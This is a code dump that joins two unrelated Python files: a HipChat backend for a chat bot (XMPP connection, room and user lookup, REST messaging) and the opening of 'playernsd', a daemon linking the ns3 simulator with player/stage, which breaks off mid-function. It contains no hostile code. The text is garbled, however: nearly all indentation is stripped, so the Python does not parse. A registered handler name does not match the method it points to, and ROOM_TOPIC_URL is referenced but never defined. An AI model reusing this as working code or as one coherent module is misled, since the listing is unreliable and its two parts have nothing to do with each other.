SET_TOPIC_URL = "https://%(server)s/v2/room/%(room_id)s/topic?auth_token=%(token)s"
PRIVATE_MESSAGE_URL = "https://%(server)s/v2/user/%(user_id)s/message?auth_token=%(token)s"
USER_DETAILS_URL = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s"
ALL_USERS_URL = ("https://%(server)s/v2/user?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s")
ALL_ROOMS_URL = ("https://%(server)s/v2/room?auth_token=%(token)s&start-index"
"=%(start_index)s&max-results=%(max_results)s&expand=items")
# From RoomsMixins
V1_TOKEN_URL = "https://%(server)s/v1/rooms/list?auth_token=%(token)s"
V2_TOKEN_URL = "https://%(server)s/v2/room?auth_token=%(token)s&expand=items"
class HipChatRosterMixin(object):
@property
def people(self):
if not hasattr(self, "_people"):
self._people = self.load('will_hipchat_people', {})
return self._people
@property
def internal_roster(self):
logging.warn(
"mixin.internal_roster has been deprecated. Please use mixin.people instead. "
"internal_roster will be removed at the end of 2017"
)
return self.people
def get_user_by_full_name(self, name):
for jid, info in self.people.items():
if info["name"] == name:
return info
return None
def get_user_by_nick(self, nick):
for jid, info in self.people.items():
if info["nick"] == nick:
return info
return None
def get_user_by_jid(self, jid):
if jid in self.people:
return self.people[jid]
return None
def get_user_from_message(self, message):
if message["type"] == "groupchat":
if "xmpp_jid" in message:
user = self.get_user_by_jid(message["xmpp_jid"])
if user:
return user
elif "from" in message:
full_name = message["from"].split("/")[1]
user = self.get_user_by_full_name(full_name)
if user:
return user
if "mucnick" in message:
return self.get_user_by_full_name(message["mucnick"])
elif message['type'] in ('chat', 'normal'):
jid = ("%s" % message["from"]).split("@")[0].split("_")[1]
return self.get_user_by_jid(jid)
else:
return None
def message_is_from_admin(self, message):
nick = self.get_user_from_message(message)['nick']
return is_admin(nick)
def message_is_allowed(self, message, acl):
nick = self.get_user_from_message(message)['nick']
return is_acl_allowed(nick, acl)
def get_user_by_hipchat_id(self, id):
for jid, info in self.people.items():
if info["hipchat_id"] == id:
return info
return None
class HipChatRoom(Bunch):
@property
def id(self):
if 'room_id' in self:
# Using API v1
return self['room_id']
elif 'id' in self:
# Using API v2
return self['id']
else:
raise TypeError('Room ID not found')
@property
def history(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get("https://{1}/v2/room/{0}/history".format(str(self.id),
settings.HIPCHAT_SERVER),
params=payload, **settings.REQUESTS_OPTIONS)
data = json.loads(response.text)['items']
for item in data:
item['date'] = datetime.strptime(item['date'][:-13], "%Y-%m-%dT%H:%M:%S")
return data
@property
def participants(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get(
"https://{1}/v2/room/{0}/participant".format(
str(self.id),
settings.HIPCHAT_SERVER
),
params=payload,
**settings.REQUESTS_OPTIONS
).json()
data = response['items']
while 'next' in response['links']:
response = requests.get(response['links']['next'],
params=payload, **settings.REQUESTS_OPTIONS).json()
data.extend(response['items'])
return data
class HipChatRoomMixin(object):
def update_available_rooms(self, q=None):
self._available_rooms = {}
# Use v1 token to grab a full room list if we can (good to avoid rate limiting)
        if hasattr(settings, "HIPCHAT_V1_TOKEN"):
url = V1_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V1_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if r.status_code == requests.codes.unauthorized:
raise Exception("V1_TOKEN authentication failed with HipChat")
for room in r.json()["rooms"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id.
room["id"] = room["room_id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
# Otherwise, grab 'em one-by-one via the v2 api.
else:
params = {}
params['start-index'] = 0
max_results = params['max-results'] = 1000
url = V2_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN}
while True:
resp = requests.get(url, params=params,
**settings.REQUESTS_OPTIONS)
if resp.status_code == requests.codes.unauthorized:
raise Exception("V2_TOKEN authentication failed with HipChat")
rooms = resp.json()
for room in rooms["items"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id
room["room_id"] = room["id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
logging.info('Got %d rooms', len(rooms['items']))
if len(rooms['items']) == max_results:
params['start-index'] += max_results
else:
break
self.save("hipchat_rooms", self._available_rooms)
if q:
q.put(self._available_rooms)
@property
def available_rooms(self):
if not hasattr(self, "_available_rooms"):
self._available_rooms = self.load('hipchat_rooms', None)
if not self._available_rooms:
self.update_available_rooms()
return self._available_rooms
def get_room_by_jid(self, jid):
for room in self.available_rooms.values():
if "xmpp_jid" in room and room["xmpp_jid"] == jid:
return room
return None
def get_room_from_message(self, message):
return self.get_room_from_name_or_id(message.data.channel.name)
def get_room_from_name_or_id(self, name_or_id):
for name, room in self.available_rooms.items():
if name_or_id.lower() == name.lower():
return room
if "xmpp_jid" in room and name_or_id == room["xmpp_jid"]:
return room
if "room_id" in room and name_or_id == room["room_id"]:
return room
return None
class HipChatXMPPClient(ClientXMPP, HipChatRosterMixin, HipChatRoomMixin, StorageMixin, PubSubMixin):
def start_xmpp_client(self, xmpp_bridge_queue=None, backend_name=""):
logger = logging.getLogger(__name__)
if not xmpp_bridge_queue:
logger.error("Missing required bridge queue")
self.xmpp_bridge_queue = xmpp_bridge_queue
self.backend_name = backend_name
ClientXMPP.__init__(self, "%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
if settings.USE_PROXY:
self.use_proxy = True
self.proxy_config = {
'host': settings.PROXY_HOSTNAME,
'port': settings.PROXY_PORT,
'username': settings.PROXY_USERNAME,
'password': settings.PROXY_PASSWORD,
}
self.rooms = []
self.default_room = settings.HIPCHAT_DEFAULT_ROOM
my_user_url = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s" % {
"user_id": settings.HIPCHAT_USERNAME.split("@")[0].split("_")[1],
"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
}
r = requests.get(my_user_url, **settings.REQUESTS_OPTIONS)
resp = r.json()
if "email" in resp:
settings.HIPCHAT_EMAIL = resp["email"]
settings.HIPCHAT_HANDLE = resp["mention_name"]
settings.HIPCHAT_NAME = resp["name"]
else:
raise EnvironmentError(
"\n\nError getting user info from Hipchat. This is usually a problem with the\n"
"username or V2 token, but here's what I heard back from them: \n\n %s\n\n" % resp
)
self.available_rooms
if hasattr(settings, "HIPCHAT_ROOMS") and settings.HIPCHAT_ROOMS:
for r in settings.HIPCHAT_ROOMS:
if r != "":
if not hasattr(self, "default_room"):
self.default_room = r
try:
self.rooms.append(self.available_rooms[r])
except KeyError:
logger.error(
u'"{0}" is not an available room, ask'
' "@{1} what are the rooms?" for the full list.'
.format(r, settings.HIPCHAT_HANDLE))
else:
for name, r in self.available_rooms.items():
if not hasattr(self, "default_room"):
self.default_room = r
self.rooms.append(r)
self.nick = settings.HIPCHAT_HANDLE
self.handle = settings.HIPCHAT_HANDLE
self.mention_handle = "@%s" % settings.HIPCHAT_HANDLE
self.whitespace_keepalive = True
self.whitespace_keepalive_interval = 30
if settings.ALLOW_INSECURE_HIPCHAT_SERVER is True:
self.add_event_handler('ssl_invalid_cert', lambda cert: True)
self.add_event_handler("roster_update", self.join_rooms)
self.add_event_handler("session_start", self.session_start)
self.add_event_handler("message", self.message_recieved)
self.add_event_handler("groupchat_message", self.room_message)
self.add_event_handler("groupchat_invite", self.room_invite)
self.add_event_handler("error", self.handle_errors)
self.add_event_handler("presence_error", self.handle_errors)
self.register_plugin('xep_0045') # MUC
def session_start(self, event):
self.send_presence()
try:
self.get_roster()
except IqError as err:
logging.error('There was an error getting the roster')
logging.error(err.iq['error']['condition'])
self.disconnect()
except IqTimeout:
logging.error('Server is taking too long to respond. Disconnecting.')
self.disconnect()
def join_rooms(self, event):
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def handle_errors(self, event):
print("got error event")
print(event)
def room_invite(self, event):
logging.info("Invite recieved for %s" % event)
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def update_will_roster_and_rooms(self):
people = self.load('will_hipchat_people', {})
# Loop through the connected rooms (self.roster comes from ClientXMPP)
for roster_id in self.roster:
cur_roster = self.roster[roster_id]
# Loop through the users in a given room
for user_id in cur_roster:
user_data = cur_roster[user_id]
if user_data["name"] != "":
# If we don't have this user in the people, add them.
                    if user_id not in people:
people[user_id] = Person()
hipchat_id = user_id.split("@")[0].split("_")[1]
# Update their info
people[user_id].update({
"name": user_data["name"],
"jid": user_id,
"hipchat_id": hipchat_id,
})
# If we don't have a nick yet, pull it and mention_name off the master user list.
if not hasattr(people[user_id], "nick") and hipchat_id in self.people:
                        user_data = self.people[hipchat_id]
people[user_id].nick = user_data["mention_name"]
people[user_id].mention_name = user_data["mention_name"]
# If it's me, save that info!
if people[user_id].get("name", "") == self.nick:
self.me = people[user_id]
self.save("will_hipchat_people", people)
self.update_available_rooms()
def room_message(self, msg):
self._send_to_backend(msg)
    def message_received(self, msg):
if msg['type'] in ('chat', 'normal'):
self._send_to_backend(msg)
def real_sender_jid(self, msg):
# There's a bug in sleekXMPP where it doesn't set the "from_jid" properly.
# Thus, this hideous hack.
msg_str = "%s" % msg
start = 'from_jid="'
start_pos = msg_str.find(start)
if start_pos != -1:
cut_start = start_pos + len(start)
return msg_str[cut_start:msg_str.find('"', cut_start)]
return msg["from"]
def _send_to_backend(self, msg):
stripped_msg = Bunch()
# TODO: Find a faster way to do this - this is crazy.
for k, v in msg.__dict__.items():
try:
pickle.dumps(v)
stripped_msg[k] = v
except:
pass
for k in msg.xml.keys():
try:
# print(k)
# print(msg.xml.get(k))
pickle.dumps(msg.xml.get(k))
stripped_msg[k] = msg.xml.get(k)
except:
# print("failed to parse %s" % k)
pass
stripped_msg.xmpp_jid = msg.getMucroom()
stripped_msg.body = msg["body"]
self.xmpp_bridge_queue.put(stripped_msg)
class HipChatBackend(IOBackend, HipChatRosterMixin, HipChatRoomMixin, StorageMixin):
friendly_name = "HipChat"
internal_name = "will.backends.io_adapters.hipchat"
required_settings = [
{
"name": "HIPCHAT_USERNAME",
"obtain_at": """1. Go to hipchat, and create a new user for will.
2. Log into will, and go to Account settings>XMPP/Jabber Info.
3. On that page, the 'Jabber ID' is the value you want to use.""",
},
{
"name": "HIPCHAT_PASSWORD",
"obtain_at": (
"1. Go to hipchat, and create a new user for will. "
"Note that password - this is the value you want. "
"It's used for signing in via XMPP."
),
},
{
"name": "HIPCHAT_V2_TOKEN",
"obtain_at": """1. Log into hipchat using will's user.
2. Go to https://your-org.hipchat.com/account/api
3. Create a token.
4. Copy the value - this is the HIPCHAT_V2_TOKEN.""",
}
]
def send_direct_message(self, user_id, message_body, html=False, card=None, notify=False, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_direct_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/private_message_user
url = PRIVATE_MESSAGE_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_direct_message: \n%s" % traceback.format_exc())
def send_room_message(self, room_id, message_body, html=False, color="green", notify=False, card=None, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_room_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_NOTIFICATION_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"color": color,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_room_message: \n%s" % traceback.format_exc())
def set_room_topic(self, room_id, topic):
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_TOPIC_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"topic": topic,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.put(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
except:
logging.critical("Error in set_room_topic: \n%s" % traceback.format_exc())
def get_room_from_message(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
return False
else:
# We're in a public room
return send_source.channel.id
else:
# Came from webhook/etc
if "room" in kwargs:
return kwargs["room"],
else:
return self.get_room_from_name_or_id(settings.HIPCHAT_DEFAULT_ROOM)["room_id"]
return False
def get_hipchat_user(self, user_id, q=None):
url = USER_DETAILS_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if q:
q.put(r.json())
else:
return r.json()
@property
def people(self):
if not hasattr(self, "_people"):
full_roster = {}
# Grab the first roster page, and populate full_roster
url = ALL_USERS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
self._people = full_roster
for k, u in full_roster.items():
if u.handle == settings.HIPCHAT_HANDLE:
self.me = u
return self._people
@property
def channels(self):
if not hasattr(self, "_channels"):
all_rooms = {}
# Grab the first roster page, and populate all_rooms
url = ALL_ROOMS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
# print(room)
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={},
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={}
)
self._channels = all_rooms
return self._channels
def normalize_incoming_event(self, event):
logging.debug("hipchat: normalize_incoming_event - %s" % event)
if event["type"] in ("chat", "normal", "groupchat") and ("from_jid" in event or "from" in event):
sender = self.get_user_from_message(event)
interpolated_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
            channel = None
            is_private_chat = False
            if "xmpp_jid" in event and event["xmpp_jid"]:
                channel = clean_for_pickling(self.channels[event["xmpp_jid"]])
            elif event["type"] in ("chat", "normal"):
                is_private_chat = True
is_direct = False
if is_private_chat or event["body"].startswith(interpolated_handle):
is_direct = True
if event["body"].startswith(interpolated_handle):
event["body"] = event["body"][len(interpolated_handle):].strip()
if interpolated_handle in event["body"]:
will_is_mentioned = True
if sender and self.me and sender.id == self.me.id:
will_said_it = True
m = Message(
content=event["body"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
# print("normalized:")
# print(m.__dict__)
return m
else:
# print("Unknown event type")
# print(event)
return None
def handle_outgoing_event(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
room = None
passed_room = None
if "room" in kwargs:
passed_room = kwargs["room"]
if "channel" in kwargs:
passed_room = kwargs["channel"]
if passed_room:
if isinstance(passed_room, str):
# User passed in a room string
room = self.get_room_from_name_or_id(passed_room)
else:
# User found the internal HipChatRoom object and passed it.
room = passed_room
else:
# Default to the room we heard this message in.
room = self.get_room_from_message(event)
room_id = None
if room and hasattr(room, "id"):
room_id = room.id
else:
room_id = room
if event.type in ["say", "reply"]:
event.content = re.sub(r'>\s+<', '><', event.content)
if hasattr(event, "source_message") and event.source_message and not room:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
self.send_direct_message(send_source.sender.id, event.content, **kwargs)
return
# Otherwise trust room.
self.send_room_message(
room_id,
event.content,
**kwargs
)
elif event.type in ["topic_change", ]:
if room_id:
self.set_room_topic(room_id, event.content)
else:
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
self.send_direct_message(send_source.sender.id, "I can't set the topic of a one-to-one chat. Let's just talk.", **kwargs)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
if event.data.original_incoming_event.type == "groupchat":
self.send_room_message(
event.data.channel.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
else:
self.send_direct_message(
event.data.sender.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
def __handle_bridge_queue(self):
while True:
try:
try:
input_event = self.xmpp_bridge_queue.get(timeout=settings.EVENT_LOOP_INTERVAL)
if input_event:
self.handle_incoming_event(input_event)
except Empty:
pass
            except (KeyboardInterrupt, SystemExit):
                break
self.sleep_for_event_loop()
def bootstrap(self):
        # Bootstrap must provide a way to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.client = HipChatXMPPClient("%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
self.xmpp_bridge_queue = Queue()
self.client.start_xmpp_client(
xmpp_bridge_queue=self.xmpp_bridge_queue,
backend_name=self.internal_name,
)
self.client.connect()
# Even though these are properties, they do some gets and self-fillings.
self.people
self.channels
self.bridge_thread = Process(target=self.__handle_bridge_queue)
self.bridge_thread.start()
self.xmpp_thread = Process(target=self.client.process, kwargs={"block": True})
self.xmpp_thread.start()
def terminate(self):
if hasattr(self, "xmpp_thread"):
self.xmpp_thread.terminate()
if hasattr(self, "bridge_thread"):
self.bridge_thread.terminate()
while (
(hasattr(self, "xmpp_thread") and self.xmpp_thread.is_alive())
or (hasattr(self, "bridge_thread") and self.bridge_thread.is_alive())
):
time.sleep(0.2)
|
__main__.py
|
#!/usr/bin/env python
#
# Copyright (c) 2011, The University of York
# All rights reserved.
# Author(s):
# Tai Chi Minh Ralph Eastwood <tcmreastwood@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the The University of York nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF YORK BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
## @file __init__.py
# @brief The NS3 daemon for player.
# @author Tai Chi Minh Ralph Eastwood <tcme500@cs.york.ac.uk>
# @author University of York
# @date 2011
## @namespace playernsd
#This is the main module which provides the interface
#between ns3 and player/stage.
## @mainpage playernsd
# @brief The NS3 daemon for player.
# @author Tai Chi Minh Ralph Eastwood <tcme500@cs.york.ac.uk>
# @author University of York
# @date 2011
#
# @section sec_details Implementation Details
#
#Details for the protocol can be found @ref page_protocol "here".
#
## @page page_protocol Protocol for communication
#
# @section sec_protocol Protocol for communication
#
# @subsection subsec_server_messages Server messages
# @li @b greetings IPADDRESS playernsd VERSION\\n
# @li @b registered
# @li @b pong\\n
# @li @b ping\\n
# @li @b error message\\n
# @li @b msgtext src\\nMESSAGE\\n
# @li @b msgbin src length\\nBINARYDATA
# @li @b propval var VALUE\\n
#
# @subsection subsec_client_messages Client messages
# @li @b greetings CLIENTID playernsd VERSION\\n
# @li @b ping\\n
# @li @b pong\\n
# @li @b error message\\n
# @li @b msgtext [dest]\\nMESSAGE\\n
# @li @b msgbin [dest] length\\nBINARYDATA
# @li @b propget var\\n
# @li @b propset var VALUE\\n
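#
# @subsection subsec_example Example session
# An illustrative exchange (client id and addresses are made up):
# @li S: greetings 192.168.0.1 playernsd 0001\\n
# @li C: greetings robot1 playernsd 0001\\n
# @li S: registered\\n
# @li C: msgtext robot2\\nhello\\n
# @li S (to robot2): msgtext robot1\\nhello\\n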
import SocketServer
import socket
import time
import threading
import optparse
import sys
import logging
import os
import shlex
import imp
from playernsd.timer import PeriodicTimer
from playernsd.remoteclient import RemoteClient
# Global config variables
## Name of daemon
NAME = "playernsd"
## Version of playernsd protocol
VERSION = "0001"
__version__ = "0.0.1"
## IP to listen on
IP = ''
## Port to listen on
PORT = 9999
## Logfile name (playernsd.log is default)
LOGFILE = NAME + '.log'
## Verbosity level (1 is default)
VERBOSE = 1
## Maximum number of bytes to send (from client) (4096 is default)
MAX_SEND = 4096
## Maximum number of bytes to read (4096+64 is default)
MAX_READ = MAX_SEND + 64
## The timeout before a ping, i.e. the interval the client manager checks
CLIENT_TIMEOUT = 1.0
## The minimum number of pings missed before the client is disconnected
# unless there is an error on the socket, in which case, it is disconnected
# immediately.
MISSED_PING = 3
## Format for logging messages
LOG_FORMAT = '%(asctime)-15s %(levelname)-6s: %(message)s'
## Globals
properties = {}
## Get the value for a property.
# @param key The key of the property to get the value for.
def propget(key):
if key in properties:
return properties[key]
else: # Ask ns3
return None
## Set the value for a property.
# @param key The key of the property to get the value for.
def propset(key, value):
if key in properties:
properties[key] = value
else: # Ask ns3
pass
## The client manager class for handling client connections.
#
# The client manager class periodically checks clients by pinging them
# and waiting for a pong response. Clients that fail to respond, will
# be discarded. It also provides routines for sending and receiving
# messages.
class ClientManager():
## Class constructor
# @param self The instance of playernsd::ClientManager.
# @param timeout The number of seconds for a timeout.
# @param missed_ping The number of missed pings allowed before a disconnect.
def __init__(self, timeout, missed_ping, simulation):
self.__client_lock = threading.Lock()
self.__timed_out_lock = threading.Lock()
self.__clients = {}
self.__clientids = {}
self.__timed_out = []
self.__ping_pong = {}
self.__t = PeriodicTimer(timeout, self.__timeout_check, [self])
## The number of missed pings allowed
self.missed_ping = missed_ping
self.__sim = simulation
self.__t.daemon = True
## Start the timeout poller
# @param self The instance of playernsd::ClientManager.
def start(self):
self.__t.start()
## Add a client that should be polled by the timeout poller
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
# @param client The associated playernsd:RemoteClient object.
def add_client(self, address, client):
with self.__client_lock:
self.__clients[address] = RemoteClient(None, address, None, client)
self.__ping_pong[address] = 1
## Register a client with name and protocol version.
# @param name The name of the client.
  # @param address The address of the client.
def register_client(self, address, name, version):
self.__clients[address].name = name
self.__clients[address].version = version
self.__clientids[name] = self.__clients[address]
if self.__sim:
self.__sim.new_client(name)
## Check if the address is handled by the client manager.
# @param identifier The identifier to refer uniquely to a client.
def has_client(self, identifier):
if isinstance(identifier, str):
return identifier in self.__clientids
else:
return identifier in self.__clients
## Check if the address is already registered in the client manager.
# @param identifier The identifier to refer uniquely to a client.
def is_registered(self, identifier):
if isinstance(identifier, str):
return identifier in self.__clientids
else:
return identifier in self.__clients and self.__clients[identifier].name != None
## Get a RemoteClient object when identified by address or id.
# @param identifier The identifier to refer uniquely to a client.
def get_client(self, identifier):
if isinstance(identifier, str):
return self.__clientids[identifier]
else:
return self.__clients[identifier]
## Remove a client that is polled by the timeout poller.
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
def remove_client(self, address):
with self.__client_lock:
if self.__clients[address].name in self.__clientids:
if self.__sim:
self.__sim.remove_client(self.__clients[address].name)
del self.__clientids[self.__clients[address].name]
del self.__clients[address]
## Get a list of client ids.
def get_clientid_list(self):
l = []
for v in self.__clients.itervalues():
l.append(v.name)
return l
## Indicate that a particular client has replied to a ping.
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
def pong(self, address):
self.__ping_pong[address] = 0
## Check if a particular client has timed out.
# @param self The instance of playernsd::ClientManager.
# @param address The address of the client.
# @return Boolean return indicating whether the client has timed out.
def is_timed_out(self, address):
return address in self.__timed_out or \
self.__ping_pong[address] < -self.missed_ping
## Send a message to a client.
#
# This is a wrapper function to send a message to a client.
# By default, this sends the message to the client that invoked the request,
# but with the parameters @a s (the target socket) and
# @a ca (the target client address), any client can be messaged.
# @param self The playernsd::ClientManager instance.
# @param msg The message to be sent.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
def send(self, msg, s, ca):
if VERBOSE > 1:
self.log(ca, 'SEND(' + str(len(msg)) + ')', msg)
# read the type of message, and see if the message should be
# simulated
command = msg.split(' ')
    if self.__sim and (command[0] == 'msgtext' or command[0] == 'msgbin'):
      self.__sim.send(command[1], self.__clients[ca].name,
          msg[msg.find('\n')+1:])
else:
s.send(msg)
## Get a property from the simulation
#
# This function requests a value from the simulation.
# @param self The playernsd::ClientManager instance.
# @param ca The client address that this request comes from.
# @param prop The name of the property.
def prop_get_sim(self, prop, ca):
if self.__sim:
cid = self.__clients[ca].name
self.__sim.prop_get(cid, prop)
else:
self.__clients[ca].socket.send('propval ' + prop + ' ' + '\n')
## Set a property in the simulation
#
# This function sets a value from the simulation.
# @param self The playernsd::ClientManager instance.
# @param _from The client address that this request comes from.
# @param prop The name of the property.
# @param val The value of the property.
def prop_set_sim(self, prop, val, ca):
if self.__sim:
cid = self.__clients[ca].name
self.__sim.prop_set(cid, prop, val)
## Broadcast a message to all clients.
#
# This is a wrapper function to broadcast a message to all clients.
# @param self The playernsd::ClientManager instance.
# @param msg The message to be sent to all clients.
def broadcast(self, msg):
    if self.__sim:
command = msg.split(' ')
self.__sim.send(command[1], '__broadcast__',
msg[msg.find('\n')+1:])
else:
for v in self.__clients.itervalues():
if msg.split(' ')[1] != v.name:
self.send(msg, v.socket, v.address)
## Receive a message from a client.
#
# This is a wrapper function to receive a message from a client and
# logs it.
# @param self The playernsd::ClientManager instance.
# @param s The socket to send the message to.
# @param ca The client address to send the message to.
# @return The message received from the client.
def recv(self, s, ca):
data = s.recv(MAX_READ)
if VERBOSE > 1:
self.log(ca, 'RECV(' + str(len(data)) + ')', data)
return data
## Receive a message from the simulation.
def recv_sim(self, _from, to, msg):
self.__clientids[to].socket.send('msgbin ' + _from + ' ' + str(len(msg)) + '\n' + msg)
## Receive a property value from the simulation.
def prop_val_sim(self, _from, prop, val):
#if val == "":
#self.send('error propnotexist\n') # TODO: Handle empty strings separately?
#else:
self.__clientids[_from].socket.send('propval ' + prop + ' ' + str(val) + '\n')
## Create a log message.
#
# This is used internally to log sent and received messages.
# This is typically only called when --verbose is passed to the daemon.
# @param self The playernsd::ClientManager instance.
# @param ca Client address related to log message.
# @param tag Tag indicating the log level.
# @param msg The message to be logged.
def log(self, ca, tag, msg):
if len(msg):
logmsg = tag + ': ' + msg.encode(sys.stdout.encoding,
'backslashreplace').replace('\n', '\\n')
log.debug(self.get_id(ca) + ' ' + logmsg)
## Get id of client or else return '__unregistered'
def get_id(self, ca):
if ca in self.__clients and self.__clients[ca].name != None:
return '[' + str(ca) + ', ' + self.__clients[ca].name + ']'
else:
return '[' + str(ca) + ', __unregistered]'
  ## Callback function that periodically checks all clients to see whether
  # they are still responding.
  # @param args Additional arguments.
  # @param kwargs Additional keyword arguments.
def __timeout_check(self, args, kwargs):
with self.__client_lock:
for k,v in self.__clients.iteritems():
try:
